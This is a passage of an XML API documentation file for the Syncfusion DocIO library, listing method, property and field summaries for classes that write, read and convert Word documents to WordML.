        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteField(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteOleObjectCharProps(Syncfusion.DocIO.DLS.WField)">
            <summary>
            
            </summary>
            <param name="embedField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFormField(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Writes the form field.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTable(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTableProps(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.WTableRow,Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Writes the table props.
            </summary>
            <param name="writer">The writer.</param>
            <param name="row">The row.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteImage(Syncfusion.DocIO.DLS.IWPicture)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WritePictureShape(Syncfusion.DocIO.DLS.WPicture,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="wPict"></param>
            <param name="height"></param>
            <param name="width"></param>
            <param name="divider"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteEmbedBody(Syncfusion.DocIO.DLS.WTextBody,System.Int32)">
            <summary>
            Writes the embed body.
            </summary>
            <param name="text">The text.</param>
            <param name="shapeId">The shape id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteInlinePicture(Syncfusion.DocIO.DLS.WPicture,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="wPict"></param>
            <param name="height"></param>
            <param name="width"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ConvertToInlineShape(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Convert the Picture into InLineShape
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteShapeObject(Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeObject"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteShapeObjTextBody(Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeObject"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSectionEnd(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBookmarkStart(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBookmarkEnd(Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Builds WordWriter doc from WordDocument
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBreak(Syncfusion.DocIO.DLS.Break,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Writes the break.
            </summary>
            <param name="docBreak">The doc break.</param>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSymbol(Syncfusion.DocIO.DLS.WSymbol)">
            <summary>
            
            </summary>
            <param name="symbol"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTextBoxShape(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Write textbox item to document;
            </summary>
            <param name="textBoxItem"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.PrepareTextBoxColl(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Prepares the text box collection.
            </summary>
            <param name="textBoxItem">The text box item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CheckShapeForCloning(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Checks the shape for cloning. Clones shape container if escher doesn't
            have container for current shape item.
            </summary>
            <param name="shapeItem">The shape item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFieldMarkAndText(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Writes the field mark and field text.
            </summary>
            <param name="fldMark">The field mark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFieldSeparator">
            <summary>
            Writes the field separator.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFieldEnd">
            <summary>
            Writes the field end.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteComment(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Writes the comment.
            </summary>
            <param name="comment">The comment.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFootnote(Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            Writes the footnote.
            </summary>
            <param name="footnote">The footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteWatermark(Syncfusion.DocIO.DLS.Watermark)">
            <summary>
            
            </summary>
            <param name="watermark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTOC(Syncfusion.DocIO.DLS.TableOfContent)">
            <summary>
            
            </summary>
            <param name="toc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFieldWithoutSeparator(System.String,Syncfusion.DocIO.DLS.WField)">
            <summary>
            Writes the Field Without Field separator for TC Entry,TOA entry,Private,Index Entry and RefDoc
            </summary>
            <param name="fieldCode">The field code.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteCommMark(Syncfusion.DocIO.DLS.WCommentMark)">
            <summary>
            Writes the comment mark.
            </summary>
            <param name="commMark">The comment mark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteOleObject(Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Writes the OLE object.
            </summary>
            <param name="oleObject">The OLE object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.AddListPictures">
            <summary>
            Adds the list pictures.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.AddPictures(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Addings the pictures to ListPictures.
            </summary>
            <param name="listFormat">The list format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteParagraphProperties(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteParagraphStyle(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Writes style of paragraph to WordWriter
            </summary>
            <param name="writer"></param>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTableProperties(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.WTableRow,Syncfusion.DocIO.DLS.IWTable,System.Boolean)">
            <summary>
            Writes the table properties.
            </summary>
            <param name="writer">The writer.</param>
            <param name="row">The row.</param>
            <param name="table">The table.</param>
            <param name="hasTableDesc">if it has a table descriptor, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CopyRowProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            
            </summary>
            <param name="paragraphProperties"></param>
            <param name="rowFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteStyleSheet(Syncfusion.DocIO.ReaderWriter.IWordWriter)">
            <summary>
            
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateDefFormat">
            <summary>
            Updates the default format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteDocumentProperties">
            <summary>
            Writes the document properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteDocumentDefaultFont">
            <summary>
            Writes the document default fonts.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBackground">
            <summary>
            Write background effect to document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WritePictureBackground(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.Background,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass)">
            <summary>
            Writes the picture background.
            </summary>
            <param name="backContainer">The back container.</param>
            <param name="oldBackContainer">The old back container.</param>
            <param name="background">The background.</param>
            <param name="escher">The escher.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CheckEscher">
            <summary>
            Noes the background.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteCommItems(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Writes the commented items.
            </summary>
            <param name="comment">The comment.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CountCommOffset(Syncfusion.DocIO.DLS.WComment)">
            <summary>
            Counts the comment offset.
            </summary>
            <param name="comment">The comment.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.Close">
            <summary>
            
            </summary>    
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateCharStyleIndex(System.String,System.Boolean)">
            <summary>
            Gets character style index by character style name.
            </summary>
            <param name="charStyleName">Name of the char style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateFieldName(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Updates the name of the field.
            </summary>
            <param name="field">The field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateFieldValue(Syncfusion.DocIO.DLS.WField,System.String)">
            <summary>
            Updates the field value.
            </summary>
            <param name="field">The field.</param>
            <param name="fieldName">Name of the field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateFieldCode(Syncfusion.DocIO.DLS.WField,System.String,System.String,System.String)">
            <summary>
            Updates the field code.
            </summary>
            <param name="field">The field.</param>
            <param name="fieldName">Name of the field.</param>
            <param name="fieldValue">The field value.</param>
            <param name="fieldSwitches">The field switches.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBreakAfter(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Writes the page break after.
            </summary>
            <param name="curPara">The current paragraph.</param>
            <param name="type">The break type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.IsPageBreakNeedToBeSkipped(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether the page break need to be skipped based on given entity owner.
            </summary>
            <param name="entity">Entity</param>
            <returns>true, if present inside TextBox/FootNote/EndNote/Header/Footer</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteListProperties(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.IWordWriterBase)">
            <summary>
            Writes the list properties.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="writer">The writer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ProcessEmptyList(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.IWordWriterBase)">
            <summary>
            Processes the empty list.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="writer">The writer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ProcessList(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.ReaderWriter.IWordWriterBase)">
            <summary>
            Processes the list.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="writer">The writer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ContinueCurrentList(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="listFormat"></param>
            <param name="useBaseStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ApplyStyle(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.WListFormat,System.Boolean)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="listFormat"></param>
            <param name="useBaseStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ModifyBaseStyles(System.Int32,Syncfusion.DocIO.ReaderWriter.IWordWriterBase)">
            <summary>
            Set sprmPIlfo value in collection of  word styles
            </summary>
            <param name="listFormatIndex">Index of the list format.</param>
            <param name="listLevelNumber">The list level number.</param>
            <param name="writer">The writer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CreateListData(Syncfusion.DocIO.DLS.ListStyle,Syncfusion.DocIO.ReaderWriter.WordStyleSheet,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Get list format from ListStyleCollection by lisStyleName.
            </summary>
            <param name="listStyle">ListStyleName</param>
            <param name="styleSheet">StyleSheet</param>
            <param name="lstFormat">List format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.UpdateListInStyle(Syncfusion.DocIO.ReaderWriter.IWordWriterBase,Syncfusion.DocIO.DLS.WParagraphStyle)">
            <summary>
            Updates the list in style.
            </summary>
            <param name="writer">The writer.</param>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.ResetLists">
            <summary>
            Resets the lists.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.CurrentWriter">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.CurrentField">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.ListPicture">
            <summary>
            Gets the list picture.
            </summary>
            <value>The list picture.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.LastParagraph">
            <summary>
            Gets the last paragraph of the document 
            </summary>
            <value>The last paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.CommentCollection">
            <summary>
            Gets the comment collection.
            </summary>
            <value>The comment collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.FootnoteCollection">
            <summary>
            Gets the footnote collection.
            </summary>
            <value>The footnote collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.EndnoteCollection">
            <summary>
            Gets the endnote collection.
            </summary>
            <value>The endnote collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.HFTextBoxCollection">
            <summary>
            Gets the header/footer text box collection.
            </summary>
            <value>The HF text box collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.TextBoxCollection">
            <summary>
            Gets the text box collection.
            </summary>
            <value>The text box collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocWriterAdapter.CommentOffsets">
            <summary>
            Gets the comment offsets.
            </summary>
            <value>The comment offsets.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter">
            <summary>
            Represents the implementation for converting Word document to Word XML file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_bNewPage">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_continue">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_bBreakBefore">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_imageCount">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_bookmarkList">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_outXml">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.m_wordDoc">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Convert(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            Converts DLS XML to Word ML file.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> to be converted to DLS XML file.</param>
            <param name="pathToWordML">The <b>string</b> that specifies the path to Word ML.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GetXsltReader">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.CorrectDlsXml">
            <summary>
            Corrects the defect in dls-xml.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifySections">
            <summary>
            Clones the sections.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifySection(System.Xml.XmlNode,System.Int32,System.Int32)">
            <summary>
            Clones the section.
            </summary>
            <param name="node">The node.</param>
            <param name="count">The count.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifyParagraph(System.Xml.XmlNode)">
            <summary>
            Clones the paragraph.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifyTable(System.Xml.XmlNode)">
            <summary>
            
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifyItems(System.Xml.XmlNode)">
            <summary>
            Clones the items.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifyBuiltinProperties">
            <summary>
            Clones the built-in properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ModifyPicture(System.Xml.XmlNode)">
            <summary>
            Modifies the picture.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ReadBinaryElement(System.Xml.XmlNode)">
            <summary>
            Reads the binary element.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.ReadImage(System.Xml.XmlNode,System.Boolean)">
            <summary>
            Reads the image.
            </summary>
            <param name="node">The node.</param>
            <param name="isMetaFile"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark.m_strName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark.m_strID">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark.Name">
            <summary>
            Gets or sets the name of the bookmark.
            </summary>
            <value>A <c>String</c> that represents the name of the bookmark.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark.ID">
            <summary>
            Gets or sets the bookmark ID.
            </summary>
            <value>A <c>String</c> that represents the ID of the bookmark.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection.m_iID">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection.Add(Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark)">
            <summary>
            Adds new bookmark to the end of the <see cref="T:System.Collections.ArrayList"/>.
            </summary>
            <param name="value">The <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Bookmark"/> to be added to the end of the <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection"/>.</param>
            <returns>
            The <see cref="T:System.Collections.ArrayList"/> index at which the <paramref name="value"/> has
            been added.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection.Add(System.String)">
            <summary>
            Adds the new bookmark.
            </summary>
            <param name="name">A <c>String</c> that represents the name of the bookmark.</param>
            <returns>The <b>integer</b> that specifies the zero-based index of the newly added bookmark.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.BookmarkCollection.Item(System.String)">
            <summary>
            Gets the ID of the specified bookmark by name. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid.m_dWidth">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid.#ctor(System.Double)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid"/> class.
            </summary>
            <param name="width">The width.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid.Width">
            <summary>
            Gets or sets the width.
            </summary>
            <value>The width.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList.Add(Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.Grid)">
            <summary>
            Adds the specified grid.
            </summary>
            <param name="grid">The grid.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList.Add(System.Double)">
            <summary>
            Adds the specified width.
            </summary>
            <param name="width">The width.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList.GetMin(System.Double)">
            <summary>
            Gets the min.
            </summary>
            <param name="end">The end.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList.GetCollCount(System.Double,System.Double)">
            <summary>
            Gets the collection count.
            </summary>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.RowList">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.RowList.Add(Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList)">
            <summary>
            Adds the specified gridlist.
            </summary>
            <param name="gridlist">The gridlist.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.tableGrid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.rowList">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.m_table">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.m_provider">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.Parce(System.Xml.XmlNode)">
            <summary>
            Parces the specified table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.Save">
            <summary>
            Saves this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.ParceTableGrid">
            <summary>
            Parces the table grid.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.TableGrid.AddRow(Syncfusion.DocIO.DLS.DocIOtoWordMLConverter.GridList)">
            <summary>
            Adds the row.
            </summary>
            <param name="row">The row.</param>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AdapterListIDHolder.m_instance">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AdapterListIDHolder.m_listStyleIDtoName">
            <summary>
            Instance members
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AdapterListIDHolder.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AdapterListIDHolder.ContainsListName(System.String)">
            <summary>
            Defines if current collection contains style.
            </summary>
            <param name="name">The name.</param>
            <returns>
            	if it is a list name, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AdapterListIDHolder.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AdapterListIDHolder.Instance">
            <summary>
            Gets AdapterListHelper object.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AdapterListIDHolder.ListStyleIDtoName">
            <summary>
            Get the collection of list styles and their id's. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.AdapterListIDHolder.LfoStyleIDtoName">
             <summary>
            Get the collection of list format override indexes and appropriate list format override styles.
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapterBase.DEF_WMFPLACEABLEHEADER_KEY">
            <summary>
            Default key value for placeable header
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.Init(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initialize the specified doc.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Reads the text body.
            </summary>
            <param name="reader">The reader.</param>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Ends the of text body.
            </summary>
            <param name="reader">The reader.</param>
            <param name="chunkType">Type of the chunk.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.Preparation(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the chunk before.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ProcessChunk(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Reads the chunk.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapterBase.ReadCustomFootnote(Syncfusion.DocIO.ReaderWriter.WordReaderBase,System.Int32,System.Int32)">
            <summary>
            Read the custom footnote marker
            </summary>
            <param name="reader">Current word reader</param>
            <param name="splittedTextLength"> Splitted text length</param>
            <param name="startPos">Startting position of splitted text</param>
        </member>
